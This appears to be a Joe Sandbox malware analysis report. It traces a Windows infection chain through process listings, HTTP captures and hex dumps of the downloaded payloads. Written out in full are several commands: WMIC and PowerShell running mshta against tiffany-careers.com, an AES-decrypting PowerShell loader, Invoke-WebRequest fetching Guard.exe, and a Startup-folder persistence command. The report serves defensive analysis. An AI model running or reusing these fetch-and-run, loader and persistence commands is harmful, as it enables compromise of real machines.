                                                                        2024-12-27 08:05:27 UTC16384INData Raw: 45 33 ff 48 8b 55 88 44 8b 4d a8 66 89 42 04 4c 8b 55 80 bb 52 00 00 00 4c 8b 85 a0 01 00 00 41 8b 88 88 00 00 00 8d 41 01 41 89 80 88 00 00 00 81 f9 fa 00 00 00 0f 8d dc 6b 04 00 b8 80 00 00 00 4d 8b d0 44 3b e8 0f 86 c5 54 04 00 49 8b 42 40 49 2b 42 20 48 d1 f8 48 89 45 18 48 89 55 c8 4c 8b b5 a8 01 00 00 41 8b cf 66 44 89 2a 45 8b c7 41 8b ba 98 00 00 00 49 8b c6 41 8b 5a 70 48 f7 d8 48 89 55 00 48 8d 45 10 48 1b d2 44 89 7d 10 48 23 d0 b8 87 00 00 00 48 89 54 24 70 44 3b e8 4c 89 54 24 68 41 8d 45 81 0f 94 c1 48 8d 55 00 41 3b c3 8b 85 98 01 00 00 41 0f 96 c0 03 c1 48 8b 8d 90 01 00 00 48 89 4c 24 60 48 8d 4d 38 48 89 4c 24 58 48 8d 4d 54 48 89 4c 24 50 48 8d 4d 50 48 89 4c 24 48 48 8d 8d 8c 00 00 00 48 89 4c 24 40 41 8b cc 89 44 24 38 89 74 24 30 48
                                                                        Data Ascii: E3HUDMfBLURLAAAkMD;TIB@I+B HHEHULAfD*EAIAZpHHUHEHD}H#HT$pD;LT$hAEHUA;AHHL$`HM8HL$XHMTHL$PHMPHL$HHHL$@AD$8t$0H
                                                                        2024-12-27 08:05:27 UTC16384INData Raw: 22 11 ff d0 48 83 c4 20 4c 8b 65 c0 4c 8b 6d c8 4c 8b 75 d0 4c 8b 7d d8 48 8b 5d e0 48 8b e5 5d c3 cc cc cc e9 8b 85 fe ff cc cc cc 40 53 48 83 ec 20 48 8b d9 eb 0f 48 8b cb e8 1d 46 00 00 85 c0 74 13 48 8b cb e8 5d 01 01 00 48 85 c0 74 e7 48 83 c4 20 5b c3 48 83 fb ff 74 06 e8 9f 09 00 00 cc e8 b9 09 00 00 cc e9 bf ff ff ff cc cc cc 48 83 ec 28 e8 57 0b 00 00 85 c0 74 21 65 48 8b 04 25 30 00 00 00 48 8b 48 08 eb 05 48 3b c8 74 14 33 c0 f0 48 0f b1 0d 9c a2 0c 00 75 ee 32 c0 48 83 c4 28 c3 b0 01 eb f7 cc cc cc 40 53 48 83 ec 20 0f b6 05 87 a2 0c 00 85 c9 bb 01 00 00 00 0f 44 c3 88 05 77 a2 0c 00 e8 86 09 00 00 e8 19 19 00 00 84 c0 75 04 32 c0 eb 14 e8 a4 5f 01 00 84 c0 75 09 33 c9 e8 35 19 00 00 eb ea 8a c3 48 83 c4 20 5b c3 cc cc cc 40 53 48 83 ec 40 80
                                                                        Data Ascii: "H LeLmLuL}H]H]@SH HHFtH]HtH [HtH(Wt!eH%0HHH;t3Hu2H(@SH Dwu2_u35H [@SH@


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49722 | 147.45.49.155 | 443 | 4268 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 08:05:33 UTC | 170 | OUT | GET /ALGglt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: tiffany-careers.com
Connection: Keep-Alive
2024-12-27 08:05:34 UTC | 397 | IN | HTTP/1.1 200 OK
etag: "da2a8-676a89c2-23c51;;;"
last-modified: Tue, 24 Dec 2024 10:15:30 GMT
content-length: 893608
accept-ranges: bytes
date: Fri, 27 Dec 2024 08:05:33 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49729 | 147.45.49.155 | 443 | 8376 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 08:05:39 UTC | 82 | OUT | GET /ZxVMIVZIX.txt HTTP/1.1
Host: tiffany-careers.com
Connection: Keep-Alive
2024-12-27 08:05:40 UTC | 425 | IN | HTTP/1.1 200 OK
etag: "1189e2-676a89bf-23c4e;;;"
last-modified: Tue, 24 Dec 2024 10:15:27 GMT
content-type: text/plain
content-length: 1149410
accept-ranges: bytes
date: Fri, 27 Dec 2024 08:05:39 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
connection: close
                                                                        Data Ascii: sion = 90 ThenATan(3611)Dec(Wales("75]124]103]114]123]103]122]107]38",48/8))DriveStatus(Wales("71]98]100]117]112]115]122]62]83]102]109]62]84]118]116]113]102]100]117]62]74]109]109]118]116]117]115]98]117]102]101]62",5/5))$TripleConclusion = $TripleConcl
                                                                        2024-12-27 08:05:40 UTC16384INData Raw: 24 42 55 54 4b 4e 49 54 54 49 4e 47 43 48 52 4f 4d 45 2c 20 24 63 61 6e 62 65 72 72 61 66 75 6e 64 61 6d 65 6e 74 61 6c 65 76 69 6c 63 65 6f 29 0a 24 43 6f 6e 73 74 72 61 69 6e 74 47 65 6e 64 65 72 49 6e 74 65 72 70 72 65 74 61 74 69 6f 6e 20 3d 20 27 34 35 31 35 34 39 32 35 36 34 37 32 30 35 37 32 37 37 32 33 33 32 39 34 34 32 36 33 36 37 38 35 35 38 38 37 30 27 0a 24 57 69 6c 6c 69 6e 67 57 65 62 70 61 67 65 46 61 73 68 69 6f 6e 20 3d 20 33 31 0a 24 54 69 6e 44 65 74 65 72 6d 69 6e 65 50 65 72 73 6f 6e 20 3d 20 37 38 0a 46 6f 72 20 24 6e 45 53 52 72 5a 41 20 3d 20 35 32 20 54 6f 20 39 31 33 0a 49 66 20 24 57 69 6c 6c 69 6e 67 57 65 62 70 61 67 65 46 61 73 68 69 6f 6e 20 3d 20 33 30 20 54 68 65 6e 0a 45 78 70 28 35 32 33 34 29 0a 41 43 6f 73 28 35 34 39
                                                                        Data Ascii: $BUTKNITTINGCHROME, $canberrafundamentalevilceo)$ConstraintGenderInterpretation = '4515492564720572772332944263678558870'$WillingWebpageFashion = 31$TinDeterminePerson = 78For $nESRrZA = 52 To 913If $WillingWebpageFashion = 30 ThenExp(5234)ACos(549



                                                                        Target ID:0
                                                                        Start time:03:05:10
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2')"
                                                                        Imagebase:0x7ff7ff5f0000
                                                                        File size:576'000 bytes
                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:1
                                                                        Start time:03:05:10
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6ee680000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:3
                                                                        Start time:03:05:11
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2')
                                                                        Imagebase:0x7ff6cb6b0000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:4
                                                                        Start time:03:05:11
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6ee680000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:5
                                                                        Start time:03:05:13
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/ghep2412_2"
                                                                        Imagebase:0x7ff6cb6b0000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:6
                                                                        Start time:03:05:14
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\mshta.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\system32\mshta.exe" https://tiffany-careers.com/ghep2412_2
                                                                        Imagebase:0x7ff769d50000
                                                                        File size:14'848 bytes
                                                                        MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        Target ID:8
                                                                        Start time:03:05:17
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                        Imagebase:0x7ff67e6d0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:9
                                                                        Start time:03:05:18
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function vyG ($mgZiHqt){return -split ($mgZiHqt -replace '..', '0x$& ')};$WAvg = vyG($ddg.SubString(0, 2048));$SKz = [System.Security.Cryptography.Aes]::Create();$SKz.Key = vyG($ddg.SubString(2048));$SKz.IV = New-Object byte[] 16;$mZouvbL = $SKz.CreateDecryptor();$KbnMJip = [System.String]::new($mZouvbL.TransformFinalBlock($WAvg, 0,$WAvg.Length)); sal fd $KbnMJip.Substring(3,3); fd $KbnMJip.Substring(6)
                                                                        Imagebase:0x7ff6cb6b0000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:10
                                                                        Start time:03:05:18
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6ee680000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:11
                                                                        Start time:03:05:24
                                                                        Start date:27/12/2024
                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Project_Information.pdf"
                                                                        Imagebase:0x7ff6e8200000
                                                                        File size:5'641'176 bytes
                                                                        MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:12
                                                                        Start time:03:05:24
                                                                        Start date:27/12/2024
                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                        Imagebase:0x7ff79c940000
                                                                        File size:3'581'912 bytes
                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:13
                                                                        Start time:03:05:25
                                                                        Start date:27/12/2024
                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1584,i,8641109857703384737,8271461273470373674,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                        Imagebase:0x7ff79c940000
                                                                        File size:3'581'912 bytes
                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:15
                                                                        Start time:03:05:29
                                                                        Start date:27/12/2024
                                                                        Path:C:\Users\user\AppData\Roaming\XKIZdXAs.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\AppData\Roaming\XKIZdXAs.exe"
                                                                        Imagebase:0x7ff7adc00000
                                                                        File size:1'083'904 bytes
                                                                        MD5 hash:2A89603D2620B2A62113513709E38E95
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 35%, ReversingLabs
                                                                        Has exited:true

                                                                        Target ID:16
                                                                        Start time:03:05:29
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe""
                                                                        Imagebase:0x7ff6cb6b0000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:17
                                                                        Start time:03:05:29
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6ee680000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:21
                                                                        Start time:03:05:35
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
                                                                        Imagebase:0x7ff6cb6b0000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:22
                                                                        Start time:03:05:35
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6ee680000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:23
                                                                        Start time:03:05:42
                                                                        Start date:27/12/2024
                                                                        Path:C:\Users\Public\Guard.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
                                                                        Imagebase:0xb50000
                                                                        File size:893'608 bytes
                                                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 8%, ReversingLabs
                                                                        Has exited:false

                                                                        Target ID:24
                                                                        Start time:03:05:44
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
                                                                        Imagebase:0xa40000
                                                                        File size:236'544 bytes
                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:25
                                                                        Start time:03:05:44
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6ee680000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:26
                                                                        Start time:03:05:54
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\wscript.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
                                                                        Imagebase:0x7ff7786c0000
                                                                        File size:170'496 bytes
                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:27
                                                                        Start time:03:05:56
                                                                        Start date:27/12/2024
                                                                        Path:C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
                                                                        Imagebase:0x7f0000
                                                                        File size:893'608 bytes
                                                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 8%, ReversingLabs
                                                                        Has exited:false

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.1447092330.00007FFB4B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ffb4b3e0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                          • Instruction ID: ba1c041b66818a4be5791e67ddc5cf0a9afc8cba5eb3fe5d23cb27279392f218
                                                                          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                          • Instruction Fuzzy Hash: 0501677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056EE58AC36A1DA36E882CB45
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.1763630844.0000021D24B00000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000021D24B00000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_21d24b00000_mshta.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                          • Instruction ID: 2fcdd8174b6e461f715adbb2d3d2b95040af39e2c15bf9fed35905f9ea968406
                                                                          • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                          • Instruction Fuzzy Hash: 1490021449544695D41411911C4929C60416398251FD494814C2690145D95D12962552
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1754630362.00007FFB49B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49B50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffb49b50000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dc9a1fd2f9a8fa3aaf7467c9bd7cad759b7cc2f535dde37ae66fae556178d05f
                                                                          • Instruction ID: 478f5ecf29dc4f2567bd04450f92c4080076119362cf965a9676d6ee141186fc
                                                                          • Opcode Fuzzy Hash: dc9a1fd2f9a8fa3aaf7467c9bd7cad759b7cc2f535dde37ae66fae556178d05f
                                                                          • Instruction Fuzzy Hash: 6B5148D2A0EBCF5FE395AE3898A52746BD1DF55224B4801FBD18ECB6C7DC194C458381
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1754630362.00007FFB49B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49B50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffb49b50000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f3818ae7c1fc748abcb97c2fd0b0590aaed6360dcae91e7cb8bc5490702a2203
                                                                          • Instruction ID: 6de900b85581334a5e6f7f075790784251d79a79c0c7d070e75341aeb4fddabb
                                                                          • Opcode Fuzzy Hash: f3818ae7c1fc748abcb97c2fd0b0590aaed6360dcae91e7cb8bc5490702a2203
                                                                          • Instruction Fuzzy Hash: 11213892E1EADF0FF396FE3C85152B466C3DF952A4B5900BAD94CC3A93DC199C058341
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1753405293.00007FFB49A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49A80000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffb49a80000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                          • Instruction ID: 71033002969539e03c7dbd936468a075a63d14636e2006d39b7f130f1c163dc6
                                                                          • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                          • Instruction Fuzzy Hash: 1401677111CB0D4FDB44EF0CE451AA5B7E0FB95364F10056DE58AC3651D636E892CB45
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1754630362.00007FFB49B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49B50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffb49b50000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 654d3fbfb39df5cd55fc900c6717cce076185a0372007f5747a3e8216b5db2c6
                                                                          • Instruction ID: 6833f92cc04a95e035986ad28f1f9905f3f1102782e2e7b76f6de75184f8e58b
                                                                          • Opcode Fuzzy Hash: 654d3fbfb39df5cd55fc900c6717cce076185a0372007f5747a3e8216b5db2c6
                                                                          • Instruction Fuzzy Hash: 9EE09263A0DD5E1EE7A6BEAC65191F46681DF54275B0401B7D91CC2951DC009C104791

                                                                          Execution Graph

                                                                          Execution Coverage:2.5%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:11.5%
                                                                          Total number of Nodes:1561
                                                                          Total number of Limit Nodes:45
                                                                          execution_graph (interactive call-graph figure; node and edge listing of the rendered graph omitted)
93927->93929 93931 7ff7adc4babc 93929->93931 93932 7ff7adc03f6c 94429 7ff7adc06394 93932->94429 93935 7ff7adc03fb6 wcsftime 93934->93935 94472 7ff7adc09734 93935->94472 93937 7ff7adc03fc4 93948 7ff7adc04050 93937->93948 94482 7ff7adc04d28 77 API calls 93937->94482 93939 7ff7adc03fd3 93939->93948 94483 7ff7adc04b0c 79 API calls Concurrency::wait 93939->94483 93941 7ff7adc03fe0 93942 7ff7adc03fe8 GetFullPathNameW 93941->93942 93941->93948 93943 7ff7adc07cf4 4 API calls 93942->93943 93944 7ff7adc04014 93943->93944 93945 7ff7adc07cf4 4 API calls 93944->93945 93946 7ff7adc04028 93945->93946 93947 7ff7adc07cf4 4 API calls 93946->93947 93949 7ff7adc4bac2 wcscat 93946->93949 93947->93948 93948->93811 94487 7ff7adc03d90 7 API calls 93950->94487 93952 7ff7adc038d5 93953 7ff7adc03cbc CreateWindowExW CreateWindowExW ShowWindow ShowWindow 93952->93953 93954->93811 93955->93818 93956->93831 93958 7ff7adc09be5 wcsftime 93957->93958 93959 7ff7adc07cf4 4 API calls 93958->93959 93960 7ff7adc09c1b 93958->93960 93959->93960 93969 7ff7adc09c4a Concurrency::wait 93960->93969 94072 7ff7adc09d84 93960->94072 93962 7ff7adc09d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93962->93969 93963 7ff7adc0ec00 4 API calls 93964 7ff7adc09d4a 93963->93964 93966 7ff7adc04680 4 API calls 93964->93966 93965 7ff7adc0ec00 4 API calls 93965->93969 93967 7ff7adc09d57 Concurrency::wait 93966->93967 93967->93848 93968 7ff7adc04680 4 API calls 93968->93969 93969->93962 93969->93965 93969->93968 93970 7ff7adc09d21 93969->93970 93970->93963 93970->93967 94075 7ff7adc06d64 93971->94075 93974 7ff7adc06d64 2 API calls 93977 7ff7adc0649d 93974->93977 93975 7ff7adc064c0 94079 7ff7adc348e0 93975->94079 93976 7ff7adc064ba FreeLibrary 93976->93975 93977->93975 93977->93976 93980 7ff7adc4c8f6 93983 7ff7adc0652c 63 API calls 93980->93983 93981 7ff7adc064db LoadLibraryExW 94098 7ff7adc06cc4 93981->94098 93985 7ff7adc4c8fe 93983->93985 93987 7ff7adc06cc4 3 API calls 93985->93987 93989 
